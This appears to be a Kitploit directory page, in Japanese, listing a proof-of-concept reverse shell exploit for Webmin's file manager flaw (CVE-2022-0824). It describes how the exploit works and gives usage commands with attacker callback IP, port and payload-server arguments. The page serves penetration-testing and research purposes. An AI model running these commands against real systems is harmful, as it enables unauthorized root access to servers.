Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Webmin-CVE-2022-0824-revshell — Webmin <=1.984、CVE-2022-0824 認証後リバースシェルPoC | Kitploit
ツール/GitHubGitHub/faisalfs10x/webmin-cve-2022-0824-revshell
特権昇格ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubfaisalfs10x/webmin-cve-2022-0824-revshell

Webmin-CVE-2022-0824-revshell

Webmin <=1.984、CVE-2022-0824 認証後リバースシェルPoC

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
111334年前Kitploit レビュー済み

Webmin-CVE-2022-0824-リバースシェル

脆弱性の説明

Webmin 1.984 以下 - ファイルマネージャの権限昇格の脆弱性 (CVE-2022-0824 および CVE-2022-0829)
デフォルトの Authentic テーマを使用している場合、ファイルマネージャモジュールに制限が設定されていない権限の低い Webmin ユーザーが、root 権限でファイルにアクセスできる可能性があります。信頼されていない追加の Webmin ユーザーがいるシステムは、すぐにアップグレードする必要があります。なお、Virtualmin システムは、ドメイン所有者の Webmin ユーザーの設定方法のため、このバグの影響を受けません。
出典: https://www.webmin.com/security.html

エクスプロイトの説明

このエクスプロイトは、ファイルマネージャにおける認証後の不適切なアクセス制御の脆弱性を利用します。このエクスプロイトは、権限の低い認証済みの攻撃者によって実行される可能性があります。攻撃者が制御するサーバーからリモートで .cgi ファイルをダウンロードし、そのパーミッションを世界中で実行可能なファイルに変更します。その後、その .cgi ファイルを実行して、攻撃者が制御するサーバーへの root 権限でのリバースコネクションを確立します。

参考: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

使用方法

root@kitploit:~
$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444

$~  python3 Webmin-revshell.py -h                                                                                                                                    
    usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]

    Webmin CVE-2022-0824 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            Target full URL, https://www.webmin.local:10000
      -c CREDENTIAL, --credential CREDENTIAL
                            Format, user:user123
      -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
                            Http server for serving payload, ex 192.168.5.120:8080
      -L CALLBACK_IP, --callback_ip CALLBACK_IP
                            Callback IP to receive revshell
      -P CALLBACK_PORT, --callback_port CALLBACK_PORT
                            Callback port to receive revshell
      -V, --version         show program's version number and exit

PoC

root@kitploit:~
ターゲットホスト: https://192.168.5.118:10000
攻撃者ホスト: 192.168.5.120

https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4

検証環境

root@kitploit:~
- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3

免責事項:

root@kitploit:~
このスクリプトはセキュリティ分析および研究のみを目的としており、不正な活動に使用された場合、私は一切の責任を負いません。
ツールをダウンロード